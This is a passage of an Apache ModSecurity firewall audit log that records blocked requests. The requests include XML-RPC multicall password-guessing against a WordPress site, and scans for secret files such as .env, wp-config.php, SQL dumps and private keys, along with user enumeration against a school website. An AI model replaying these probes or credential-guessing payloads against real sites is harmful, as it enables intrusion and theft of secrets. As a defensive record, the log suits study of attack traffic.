"CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890018348920 4480 (- - -) Stopwatch2: 1747890018348920 4480; combined=3153, p1=426, p2=2574, p3=0, p4=0, p5=87, sr=74, sw=66, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11c03f38-Z-- --9fdf4826-A-- [22/May/2025:12:01:18 +0700] aC6vnmfriXjg62qQwE8eZwAAAJE 103.236.140.4 38530 103.236.140.4 8181 --9fdf4826-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 220.158.233.237 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 220.158.233.237 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9fdf4826-C-- system.multicallmethodNamewp.getUsersBlogsparamsAdminantix123456 --9fdf4826-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fdf4826-E-- --9fdf4826-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 220.158.233.237 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890078560010 4692 (- - -) Stopwatch2: 1747890078560010 4692; combined=3239, p1=480, p2=2641, p3=0, p4=0, p5=69, sr=88, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fdf4826-Z-- --da31d45f-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi0zAAAAMw 103.236.140.4 43962 103.236.140.4 8181 --da31d45f-B-- GET /web.config HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --da31d45f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da31d45f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332224848 764 (- - -) Stopwatch2: 1747890332224848 764; combined=289, p1=253, p2=0, p3=0, p4=0, p5=36, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da31d45f-Z-- --33e28b47-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi0zgAAANY 103.236.140.4 43966 103.236.140.4 8181 --33e28b47-B-- GET /database_backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --33e28b47-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33e28b47-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332230426 1800 (- - -) Stopwatch2: 1747890332230426 1800; combined=670, p1=291, p2=355, p3=0, p4=0, p5=24, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33e28b47-Z-- --4a997a26-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8fiQAAAJQ 103.236.140.4 43972 103.236.140.4 8181 --4a997a26-B-- GET /api/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4a997a26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a997a26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332248639 559 (- - -) Stopwatch2: 1747890332248639 559; combined=214, p1=185, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a997a26-Z-- --821f4328-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi00QAAAMc 103.236.140.4 43978 103.236.140.4 8181 --821f4328-B-- GET /database.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --821f4328-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --821f4328-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332253978 1473 (- - -) Stopwatch2: 1747890332253978 1473; combined=553, p1=253, p2=272, p3=0, p4=0, p5=28, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --821f4328-Z-- --2b5a9f5a-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi00gAAAMo 103.236.140.4 43980 103.236.140.4 8181 --2b5a9f5a-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2b5a9f5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2b5a9f5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332255188 611 (- - -) Stopwatch2: 1747890332255188 611; combined=251, p1=225, p2=0, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2b5a9f5a-Z-- --41997048-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi00wAAAM0 103.236.140.4 43982 103.236.140.4 8181 --41997048-B-- GET /backup.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --41997048-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41997048-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332255516 1445 (- - -) Stopwatch2: 1747890332255516 1445; combined=502, p1=249, p2=231, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41997048-Z-- --d9850e5b-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8figAAAI0 103.236.140.4 43988 103.236.140.4 8181 --d9850e5b-B-- GET /server.key HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d9850e5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9850e5b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332256890 1341 (- - -) Stopwatch2: 1747890332256890 1341; combined=490, p1=255, p2=213, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9850e5b-Z-- --aea2521d-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8fiwAAAJE 103.236.140.4 43990 103.236.140.4 8181 --aea2521d-B-- GET /_vti_pvt/service.pwd HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --aea2521d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aea2521d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".pwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332257291 1354 (- - -) Stopwatch2: 1747890332257291 1354; combined=497, p1=249, p2=225, p3=0, p4=0, p5=22, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aea2521d-Z-- --6280fe3d-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi01QAAAM4 103.236.140.4 43994 103.236.140.4 8181 --6280fe3d-B-- GET /dump.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6280fe3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6280fe3d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332280004 1734 (- - -) Stopwatch2: 1747890332280004 1734; combined=652, p1=329, p2=297, p3=0, p4=0, p5=25, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6280fe3d-Z-- --6320d961-A-- [22/May/2025:12:05:32 +0700] aC6wnGfriXjg62qQwE8fkQAAAIU 103.236.140.4 44006 103.236.140.4 8181 --6320d961-B-- GET /etc/ssl/private/server.key HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --6320d961-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6320d961-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747890332312456 1482 (- - -) Stopwatch2: 1747890332312456 1482; combined=541, p1=265, p2=250, p3=0, p4=0, p5=26, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6320d961-Z-- --4435872b-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi02wAAAMY 103.236.140.4 44026 103.236.140.4 8181 --4435872b-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --4435872b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4435872b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332344289 613 (- - -) Stopwatch2: 1747890332344289 613; combined=212, p1=176, p2=0, p3=0, p4=0, p5=36, sr=51, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4435872b-Z-- --68c09060-A-- [22/May/2025:12:05:32 +0700] aC6wnCektx75wRFPQyi03AAAAMM 103.236.140.4 44034 103.236.140.4 8181 --68c09060-B-- GET /wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 213.232.87.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 213.232.87.232 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --68c09060-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --68c09060-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890332459743 835 (- - -) Stopwatch2: 1747890332459743 835; combined=361, p1=260, p2=0, p3=0, p4=0, p5=101, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --68c09060-Z-- --7609091d-A-- [22/May/2025:12:05:34 +0700] aC6wniektx75wRFPQyi07wAAAM0 103.236.140.4 44074 103.236.140.4 8181 --7609091d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.8 (KHTML, like Gecko) Beamrise/17.2.0.9 Chrome/17.0.939.0 Safari/535.8 Accept-Charset: utf-8 --7609091d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7609091d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747890334341635 597 (- - -) Stopwatch2: 1747890334341635 597; combined=226, p1=198, p2=0, p3=0, p4=0, p5=28, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7609091d-Z-- --1acdd55f-A-- [22/May/2025:12:39:33 +0700] aC64lWfriXjg62qQwE81UwAAAIo 103.236.140.4 53144 103.236.140.4 8181 --1acdd55f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --1acdd55f-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelAdmin@123! --1acdd55f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1acdd55f-E-- --1acdd55f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747892373663000 5118 (- - -) Stopwatch2: 1747892373663000 5118; combined=3860, p1=488, p2=3217, p3=0, p4=0, p5=91, sr=140, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1acdd55f-Z-- --9823ca33-A-- [22/May/2025:12:43:24 +0700] aC65fGfriXjg62qQwE844AAAAIU 103.236.140.4 56832 103.236.140.4 8181 --9823ca33-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --9823ca33-C-- system.multicallmethodNamewp.getUsersBlogsparamsfaadhelantix12! --9823ca33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9823ca33-E-- --9823ca33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747892604045516 4235 (- - -) Stopwatch2: 1747892604045516 4235; combined=2911, p1=349, p2=2407, p3=0, p4=0, p5=91, sr=65, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9823ca33-Z-- --8cc66115-A-- [22/May/2025:12:49:17 +0700] aC663Sektx75wRFPQyjRvQAAANQ 103.236.140.4 34090 103.236.140.4 8181 --8cc66115-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; http://www.google.com/bot.html) Accept-Charset: utf-8 --8cc66115-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8cc66115-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747892957480157 773 (- - -) Stopwatch2: 1747892957480157 773; combined=334, p1=295, p2=0, p3=0, p4=0, p5=39, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8cc66115-Z-- --72f2d511-A-- [22/May/2025:13:05:14 +0700] aC6-mmfriXjg62qQwE9A7wAAAIg 103.236.140.4 48696 103.236.140.4 8181 --72f2d511-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.148.31.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.148.31.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --72f2d511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72f2d511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747893914273998 3341 (- - -) Stopwatch2: 1747893914273998 3341; combined=1652, p1=599, p2=1016, p3=0, p4=0, p5=37, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72f2d511-Z-- --60fece5c-A-- [22/May/2025:13:22:31 +0700] aC7Cp30O04WKE1HJ5iRWfwAAAAM 103.236.140.4 36194 103.236.140.4 8181 --60fece5c-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 91.206.169.53 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 91.206.169.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --60fece5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --60fece5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747894951824638 848 (- - -) Stopwatch2: 1747894951824638 848; 